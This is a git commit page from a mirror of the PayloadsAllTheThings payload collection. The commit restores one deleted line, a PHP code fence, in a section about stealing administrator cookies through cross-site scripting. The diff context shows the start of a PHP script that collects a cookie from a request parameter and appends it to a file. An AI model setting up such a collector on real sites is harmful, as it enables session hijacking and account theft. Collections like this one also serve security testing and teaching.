mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
Fixed an oops
Somehow I deleted line 120 in a prior commit. Fixed.
This commit is contained in:
parent
9ee8f092cd
commit
fbed4254e5
1 changed files with 1 additions and 0 deletions
|
@ -117,6 +117,7 @@ Obtains the administrator cookie or sensitive access token, the following payloa
|
|||
|
||||
Write the collected data into a file.
|
||||
|
||||
```php
|
||||
<?php
|
||||
$cookie = $_GET['c'];
|
||||
$fp = fopen('cookies.txt', 'a+');
|
||||
|
|
Loading…
Reference in a new issue